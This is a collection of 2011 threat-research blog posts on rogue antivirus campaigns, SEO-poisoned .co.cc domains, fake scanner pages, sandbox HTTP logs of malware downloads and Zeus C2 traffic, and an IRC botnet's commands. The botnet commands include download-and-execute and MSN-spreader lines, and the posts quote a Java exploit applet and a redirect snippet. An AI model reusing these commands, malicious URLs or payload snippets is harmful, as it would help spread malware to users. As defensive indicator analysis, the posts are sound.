Tag Archives: exploits

Suspicious activity for domains .co.cc

While doing some google searches for particular keywords, with a specific google search we have noted that in some cases the websites found have the same URL after the .co.cc and that all of them use a $_GET[‘k’] query related to the keyword I was searching for. Almost all the links found have also the same HTML template and they look like to be non-live websites, maybe are used to capture keywords or are related to some kind of SEO poisoning activity:

Image

The secret has been revealed:

GET /index.php?k=virus-scan HTTP/1.1
Host: liostimoremvfk.co. cc

Response:

HTTP/1.1 302 Found
Date: Tue, 19 Apr 2011 16:43:03 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Location: hxxp://includingwhich.cz. cc/in.cgi?4&seoref=[...]
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
 
....................

There is a redirect to… guess what ? A fake scanner page…

Image

Image

Is prompted a popup window to download the rogue security software setup:

Image

Network traffic:

GET /get_file.php?id=16 HTTP/1.1
Host: mywebavck-2.co. cc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
 
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:41:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Description: File Transfer
Content-Length: 331776
Content-Disposition: attachment; filename="setup.exe"
Connection: close
Content-Type: application/download
 
MZ......................@..................[...]

The setup file looks like to be almost undetected by Antiviruses:

Report date: 2011-04-19 16:51:48 (GMT 1)
File name: setup-exe
File size: 331776 bytes
MD5 hash: c6adf910c8e56b4b0577ddface41898d
SHA1 hash: 978794a9705fec3f5dd5d7256b147a75d6c6f6fe
Detection rate: 0 on 10 (0%)
Status: CLEAN

Few malicious domains .co.cc used to capture keywords:

plandicardyu9.co.cc/index.php?k=Spun
pensvernohp.co.cc/index.php?k=16-blocks-wiki
jacbocome6.co.cc/index.php?k=Pianist,-The
setibetkeee8r.co.cc/index.php?k=xXx
vacuumguide.co.cc/index.php?k=loop
vacuumreview.co.cc/index.php?k=actress
catbepow372.co.cc/index.php?k=Few-Good-Men,-A
loismolaqimvab.co.cc/index.php?k=Upside-of-Anger,-The
loismolaqimvab.co.cc/index.php?k=007-goldeneye
nutnorbntegiw0.co.cc/index.php?k=Hoodwinked!
pordisfpoc64.co.cc/index.php?k=faculty-the
bustmiswoodckosnh.co.cc/index.php?k=Webs
bustmiswoodckosnh.co.cc/index.php?k=007-The-Spy-Who-Loved-Me
lrecamac8r4.co.cc/index.php?k=Shaft
phoderadc9i.co.cc/index.php?k=Sentinel,-The
buzzpozapyq5.co.cc/index.php?k=Freedomland
tionforhardversry.co.cc/index.php?k=007-Octopussy
scesniasay3u.co.cc/index.php?k=Prince-and-Me-2,-The
rohislantsello.co.cc/index.php?k=Grind
xpowgihydreegk.co.cc/index.php?k=Gladiatress
xpowgihydreegk.co.cc/index.php?k=15-minutes-pr
buitalanbu6.co.cc/index.php?k=Ali
arenelx1l.co.cc/index.php?k=Open-Range
saduhydsp.co.cc/index.php?k=007-Goldfinger
saiclevaps1s.co.cc/index.php?k=Alien:-Resurrection
hoerhinbendescrt.co.cc/index.php?k=Core,-The
fledunoutin5t.co.cc/index.php?k=21-grams-casting-director
teoucbosonenfo.co.cc/index.php?k=Rules-of-Attraction,-The
apsagsoumyp42o.co.cc/index.php?k=Predator-2
fanbaperpeisg.co.cc/index.php?k=Dungeons
metersaddrantb7.co.cc/index.php?k=Fast-and-the-Furious,-The
ibsummabobs1q.co.cc/index.php?k=Body,-The
tingrobfoz60.co.cc/index.php?k=15-minutes-of-shame
macronessi9.co.cc/index.php?k=1941
macronessi9.co.cc/index.php?k=When-a-Stranger-Calls
filtsubscalsuvrl.co.cc/index.php?k=Die-Hard:-With-a-Vengeance
siidosantv.co.cc/index.php?k=007-Licence-to-Kill
siidosantv.co.cc/index.php?k=Get-Shorty
questeprap28.co.cc/index.php?k=Bourne-Identity,-The
geoganshi5n5.co.cc/index.php?k=Jaws-2
riapaewarmcooksbm.co.cc/index.php?k=007-live-and-let-die-online
decapivetr.co.cc/index.php?k=Changing-Lanes
ictiforkh.co.cc/index.php?k=Cheaper-by-the-Dozen
ictiforkh.co.cc/index.php?k=Spun
sandsatdar3.co.cc/index.php?k=Dances-with-Wolves
gatthanbastams.co.cc/index.php?k=Hudsucker-Proxy,-The
gatthanbastams.co.cc/index.php?k=Cellular
deathstippark1h.co.cc/index.php?k=English-Patient,-The
deathstippark1h.co.cc/index.php?k=Clerks.
crowpaetucep95m.co.cc/index.php?k=Clerks.
adefarichz.co.cc/index.php?k=Dogma
adefarichz.co.cc/index.php?k=16-blocks-review
talcoutip2y.co.cc/index.php?k=Pride
opupreggazti.co.cc/index.php?k=Fahrenheit-9/11
opupreggazti.co.cc/index.php?k=bewitched-cast
sqeestheogwenrepm83.co.cc/index.php?k=Bread-and-Roses
pekiguaningmv.co.cc/index.php?k=Rollerball
congrinaleo.co.cc/index.php?k=View-from-the-Top
cuttcanthnaznu.co.cc/index.php?k=Scream-3
kannmowarmq2.co.cc/index.php?k=Cliffhanger
gesnecalti7qc.co.cc/index.php?k=U-571
parlandcolrac1u.co.cc/index.php?k=Scream-2
rapaconptf.co.cc/index.php?k=Ali
profifreturqn.co.cc/index.php?k=007-Octopussy
dendthylthejnu.co.cc/index.php?k=Mummy,-The
ictiforkh.co.cc/index.php?k=Corky-Romano

Note that the value after k= is same as page title!

Other related malicious domains:

apsagsoumyp42o.co.cc
cklik.in
degreesupplies.cz.cc
montlimal.co.cc
optimizes.cz.cc
sadrfedwer.co.cc
talcoutip2y.co.cc
volecap.cz.cc
www.cklik.in
yhnecqapp.co.cc

All these malicious domains appear to be hosted in this IP address:

95.169.191.217
ns2.km35913.keymachine.de
95.169.160.0/19 - Keyweb AG IP Network
AS31103 - KEYWEB-AS Keyweb AG

IPVoid analysis:

http://www.ipvoid.com/scan/95.169.191.217

Recent malicious URLs analyzed #3

Report containing malicious urls logged:

POST /kj97hk9878b8j9hb.php?ini=XXX HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: simplycomics. in
 
POST /logos/XXX/61e3a327d/logo.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: greatwebdata. in
 
POST /werber/b10353d72/217.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: droolbuy. in
 
POST /perce/XXX/21c383b7c/qwerce.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: migented. in
 
POST /college_news/college_news/college_news/college_news/build.php HTTP/1.0
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /zeus/zeus/config.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /help.txt HTTP/1.1
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /images/Telegrama.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 80.13.172.136
 
GET /gx/444.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: toxtb. info
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /gx2/333.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ucfya. info
 
POST /zeus/zeus/server%5bphp%5d/gate.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.nxmtv. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1015000813 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: susimumezez. com
 
GET /v14/setup.php?act=fb_start&id=XXX HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: udjng. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hawfruit. com
 
GET /2wave.php?Yfe6r8E2QkJI0l5aLw0nFAqjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: hxxp://tubefaster. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mattfoy. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hslibrary. com
 
GET /2wave.php?Yfe6r8M2QkJI0l5aLwkkExXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://ad.adserverplus. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: utling. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: topsaj. com
 
GET /2wave.php?Yfe6r8U2QkJI0l5aLw0mEQKjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: http://trailersandvideos. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /in.cgi?groups HTTP/1.0
Referer: hxxp://sl.servednetworks. com/www/delivery/afr.php?zoneid=57&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m28m. in
 
GET /2wave.php?Yfe6r8k2QkJI0l5aLQwvHBXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://www.investopedia. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com

URLVoid domain analysis:

http://www.urlvoid.com/scan/simplycomics.in
http://www.urlvoid.com/scan/greatwebdata.in
http://www.urlvoid.com/scan/droolbuy.in
http://www.urlvoid.com/scan/migented.in
http://www.urlvoid.com/scan/cnscut.cn
http://www.ipvoid.com/scan/91.206.200.242
http://www.ipvoid.com/scan/80.13.172.136
http://www.urlvoid.com/scan/toxtb.info
http://www.urlvoid.com/scan/rvvxe.info
http://www.urlvoid.com/scan/qvnok.info
http://www.urlvoid.com/scan/ucfya.info
http://www.urlvoid.com/scan/nxmtv.info
http://www.urlvoid.com/scan/ddk100.com
http://www.urlvoid.com/scan/susimumezez.com
http://www.urlvoid.com/scan/udjng.info
http://www.urlvoid.com/scan/hawfruit.com
http://www.urlvoid.com/scan/mattfoy.com
http://www.urlvoid.com/scan/hslibrary.com
http://www.urlvoid.com/scan/utling.com
http://www.urlvoid.com/scan/topsaj.com
http://www.urlvoid.com/scan/thevehic.com
http://www.urlvoid.com/scan/qvnok.info
http://www.urlvoid.com/scan/m28m.in
http://www.urlvoid.com/scan/thevehic.com

Malicious URLs Hosting Fake Scanner Pages

We have detected few fake scanner pages that are still active and that distribute the dangerous executable files of rogue security software.

First initial fake alert:

Image

Fake scanner page in action:

Image

Prompt to download the (infected) setup file of the rogue software:

Image

Report date: 2011-04-15 01:10:23 (GMT 1)
File name: bestav2-exe
File size: 374784 bytes
MD5 hash: a31da4fa72e277fe8abf298a4aa30d9d
SHA1 hash: 0f7bb119ff7889d3981d8ecdf2494c1cf4ba1a42
Detection rate: 7 on 10 (70%)
Status: INFECTED
Antivirus Database Engine Result
Avast 15/04/2011 5.0 Win32:Renos-ACT [Trj]
AVG 15/04/2011 10.0.0.1190 FakeAlert.AAW
Avira AntiVir 15/04/2011 8.2.4.202 TR/Winwebsec.A.4010
Comodo 15/04/2011 4.0 TrojWare.Win32.Trojan.Agent.Gen
Emsisoft 15/04/2011 5.1.0.2 Trojan.Fakealert!IK
F-Prot 15/04/2011 6.3.3.4884 W32/FakeAlert.LY.gen!Eldorado
Ikarus 15/04/2011 T31001097 Trojan.Fakealert

There is also a reference to an external JS file:

<script type="text/javascript" src="hxxp://figaroo. ru/tools/ip.js"></script>

List of malicious domains and IPs:

hxxp://www.downloadmyprog. biz
hxxp://91.213.217.247:80
hxxp://184.82.159.52:80
hxxp://91.213.217.244:80
hxxp://91.213.217.246:80
hxxp://www.ratingswatchdiscussions. com
hxxp://91.213.217.225:80
hxxp://184.82.159.51:80
hxxp://91.213.217.229:80
hxxp://184.82.159.52:80
hxxp://www.powerwerxmotorcorp. com
hxxp://91.213.217.241:80
hxxp://www.purityanddivinityspa. com

At the end of few fake scanner pages, there is also a surprise:

Image

An obfuscated malicious JS code (note also the random function names at the end of the script) that leads most probably to an exploit kit. We can extract also the JS code from the file “/index_files/set00000.js”, used to display the fake threats in the fake scanner page:

Image

URLVoid domain analysis:

http://www.urlvoid.com/scan/downloadmyprog.biz
http://www.urlvoid.com/scan/ratingswatchdiscussions.com
http://www.urlvoid.com/scan/purityanddivinityspa.com
http://www.urlvoid.com/scan/powerwerxmotorcorp.com

IRC Botnet Logs with MSN Spreader

We noticed the following details in a log file in our sandbox:

:m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr
:Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/
:Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177

These details are related to an IRC botnet and we can extract few commands:

1. Bots with country (-c) as FRA/ESP/ITA join channel “#it”:

.j -c FRA,ESP,ITA #it

2. Download and execute a remote file:

.dl http://efirst-data. in/install.48208.exe

3. Enable module MSN spreader:

.mod msn on

4. Initialize MSN spreader:

.msn.int

5. Set MSN spreader URL:

.msn.set http://image4msn. com/

Now the victim will send to all his MSN contacts the malicious URL:

http://image4msn. com/

This URL contains a java exploit, as we can see from here:

<body><applet code='mordor.saruman.class' archive='./games/plugins.jar'><param name='sko' value=[...]

Report 2011-03-28 14:19:39 (GMT 1)
File Name plugins-jar
File Size 9015 bytes
File Type Unknown file
MD5 Hash 7b0418be80084558cf34f6bdc2d5b112
SHA1 Hash 727d343bfd8f5bb970df10fed97eccb9562ac634
Detections: 0 / 9 (0 %)
Status CLEAN

This is an image of the malicious URL when visited:

Image

Unprotected folder reveals existence of other files (exploit kit):

Image

Network traffic:

GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
POST /objects/ocget.dll HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: activex.microsoft. com
 
GET /d.php?f=18&e=0 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com

An executable file (PE) is downloaded:

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 12:22:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Pragma: public
Expires: Mon, 28 Mar 2011 12:22:17 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 91280
Connection: close
Content-Type: application/x-msdownload

MZ

Recent malicious URLs analyzed #2

Report containing malicious urls logged:

POST /msql.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: www.adamplus. com
 
GET /coldman.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lostyear. ru
 
GET /czl/zlo.cl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casualhopperois. com
 
POST /zumboo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lameedge. ru
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rapidshare. com
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rs851tl2.rapidshare. com
 
GET /exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.zdropp.co. cc
 
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
GET /install.48208.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: efirst-data. in
 
POST /djcash.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: talkwire. in
 
GET /download.php?token=4910b18a623c549e2e1bc53f6cc0682a4579fbf6 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 5630.zdropp.co. cc
 
POST /trackstats.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
POST /application.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
GET /download.php?bundle=1 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: s6199.wdropp.co. cc
 
GET /list.php?c=XXX&v=2&t=0,2486841 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru
 
GET /tm/crypt.exe?t=0,6011011 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: www.derquda. com
 
GET /sn.php?c=XXX&t=0,8542902 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru

URLVoid domain analysis:

http://www.urlvoid.com/scan/justoldleft.ru
http://www.urlvoid.com/scan/derquda.com
http://www.urlvoid.com/scan/s6199.wdropp.co.cc
http://www.urlvoid.com/scan/wdropp.co.cc
http://www.urlvoid.com/scan/6199.zdropp.co.cc
http://www.urlvoid.com/scan/zdropp.co.cc
http://www.urlvoid.com/scan/5630.zdropp.co.cc
http://www.urlvoid.com/scan/talkwire.in
http://www.urlvoid.com/scan/efirst-data.in
http://www.urlvoid.com/scan/image4msn.com
http://www.urlvoid.com/scan/get.zdropp.co.cc
http://www.urlvoid.com/scan/rs851tl2.rapidshare.com
http://www.urlvoid.com/scan/lameedge.ru
http://www.urlvoid.com/scan/casualhopperois.com
http://www.urlvoid.com/scan/adamplus.com
http://www.urlvoid.com/scan/lostyear.ru

Recent malicious URLs analyzed

Report containing malicious urls logged:

GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
GET /exe/key/key4_0322.exe HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
POST /piastro.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: deltadataserve.in
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /zz7654/cfg.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /zlv.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
GET /maya.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
POST /zz7654/g765.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /e.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casinovergelijker.com
 
GET /wawxb/kllpcttkx.php?adv=adv477&id=XXX&c=XXX HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: abcartel.com
 
GET /emikavigat.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: xudezyj903.virtue.nu
 
GET /otasenaqynec.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: opytibuxi.virtue.nu
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: newpharmacyschools.ru
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: ql578.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /files/453734526/nig.exe HTTP/1.0
User-Agent: Mozilla
Host: rapidshare.com
 
GET /dw/dm.php?id=XXX&ver=dm0&v=2011_03_05&er=S_wd_rd_wrd_rrd_we_re_wc_rc_W5.1- HTTP/1.0
User-Agent: Mozilla/4.0 (SP3 WINLD)
Host: comcmdrun.com
 
GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: jeqtzjte.co.cc
 
GET /install.34556.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thepackplace.in
 
GET /dl.php?i=15 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 2367.in
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: releaseantivirus.com

URLVoid domain analysis:

http://www.urlvoid.com/scan/comcmdrun.com
http://www.ipvoid.com/scan/222.88.205.195
http://www.urlvoid.com/scan/xx7314.91mt.com
http://www.urlvoid.com/scan/jz9233.91mt.com
http://www.urlvoid.com/scan/ql578.91mt.com
http://www.urlvoid.com/scan/newpharmacyschools.ru
http://www.urlvoid.com/scan/opytibuxi.virtue.nu
http://www.urlvoid.com/scan/xudezyj903.virtue.nu
http://www.urlvoid.com/scan/abcartel.com
http://www.urlvoid.com/scan/casinovergelijker.com
http://www.urlvoid.com/scan/yuyu98.com
http://www.urlvoid.com/scan/aaphonecard.com
http://www.urlvoid.com/scan/bq8378.91mt.com
http://www.urlvoid.com/scan/cz5834.91mt.com
http://www.urlvoid.com/scan/om4089.91mt.com
http://www.urlvoid.com/scan/om4089.91mt.com
http://www.urlvoid.com/scan/deltadataserve.in
http://www.urlvoid.com/scan/zc8278.91mt.com
http://www.urlvoid.com/scan/ac6211.91mt.com
http://www.urlvoid.com/scan/jeqtzjte.co.cc
http://www.urlvoid.com/scan/thepackplace.in
http://www.urlvoid.com/scan/2367.in
http://www.urlvoid.com/scan/releaseantivirus.com

New Rogue Software: Windows Support System

Windows Emergency System (similar to Windows Emergency System) is another rogue security software that aims to scan the system to find errors, instead it shows fake errors, stating it is needed to buy the full version of the software to fix the non-existent errors.

Windows Support System GUI

Fake security alerts:

Fake security alerts

Fake scanner page:

Fake scanner page

Other fake security alert:

Fake security alerts

Regedit is disabled:

Regedit disabled

Installer screenshot:

Installer

Windows Support System is distributed and spreaded by web exploit kits:

GET /count8.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: falsewi. com
 
GET /showthread.php?t=335918 HTTP/1.0
Referer: hxxp://sweetvegetables.gv.vg/showthread.php?t=4005006
Host: sweetvegetables.gv. vg

Setup.exe is downloaded:

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 00:50:50 GMT
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
Content-Length: 18944
Content-Disposition: inline; filename=setup.exe

Report date: 2011-03-22 02:40:57 (GMT 1)
File name: setup.exe
File size: 18944 bytes
MD5 hash: d94f2733e1fa56dd00431927f72b68da
SHA1 hash: 8114e64151a8d64f4364933eb1e9cb28a39693bc
Detection rate: 0 on 9 (0%)
Status: CLEAN

Fake scanner page:

GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mbbckoua.co. cc

Download of another rogue security software:

GET /BestAntivirus2011.exe HTTP/1.0
Referer: hxxp://mbbckoua.co. cc/fast-scan/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dl.mbbckoua.co. cc

Report date: 2011-03-22 02:40:57 (GMT 1)
File name: bestantivirus2011-exe
File size: 323584 bytes
MD5 hash: dcd660aa86a5cba024ce9d01bb76f45a
SHA1 hash: 3e85fa411bf9cb44049d61382cd95a66b7fb2180
Detection rate: 0 on 9 (0%)
Status: CLEAN

Another web exploit that distribute Windows Support System:

GET /1010/in.cgi?10 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: roleplaysanctuary.co. cc

Suspicious redirection:

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='hxxp://erofax. ru/podm/go.php'">
</head>
<body>
document moved <a href="hxxp://erofax. ru/podm/go.php">here</a>
</body>
</html>

Fake scanner page:

GET /scan1b/images/sprite.png HTTP/1.0
Referer: hxxp://antivirus-9465.co. cc/scan1b/164
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: antivirus-9465.co. cc

Download of setup file of Windows Support System:

GET /scan1b/164/freesystemscan.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: antivirus-9465.co. cc

Fake payment system:

GET /soft-usage/favicon.ico?0=1200&1=XXX&2=i-s&3=164&4=2600&5=5&6=1&7=62900.2180&8=1040 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: soft-store-inc. com

URLVoid domain analysis:

http://www.urlvoid.com/scan/falsewi.com
http://www.urlvoid.com/scan/sweetvegetables.gv.vg
http://www.urlvoid.com/scan/mbbckoua.co.cc
http://www.urlvoid.com/scan/dl.mbbckoua.co.cc
http://www.urlvoid.com/scan/erofax.ru
http://www.urlvoid.com/scan/roleplaysanctuary.co.cc
http://www.urlvoid.com/scan/antivirus-9465.co.cc
http://www.urlvoid.com/scan/soft-store-inc.com
http://www.urlvoid.com/scan/dl.juoiossf.co.cc
http://www.urlvoid.com/scan/juoiossf.co.cc
http://www.urlvoid.com/scan/dl.your-fast-antivirus-scan.cw.cm
http://www.urlvoid.com/scan/your-fast-antivirus-scan.cw.cm

Knowmore.org Infected with Malicious Javascript Code

John has informed us about a new possible website infected:

hxxp://www.knowmore. org

A fast scan with vscan.urlvoid.com report that the site is infected:

Report 2011-03-19 01:20:31 (GMT 1)
File Name knowmore-org
File Size 22121 bytes
File Type Unknown file
MD5 Hash d29b303c72a2330ac13155be0b280221
SHA1 Hash 3cf9d0637551e0ce5ac7a9ce243b35e13caf5e80
Detections: 3 / 9 (33 %)
Status INFECTED

We have dumped the content of the website:

Knowmore-org Dump

So we have browsed the website in our test environment and this is the result:

GET /count11.php HTTP/1.0
Referer: hxxp://knowmore. org/
Host: maribit. com
 
GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0
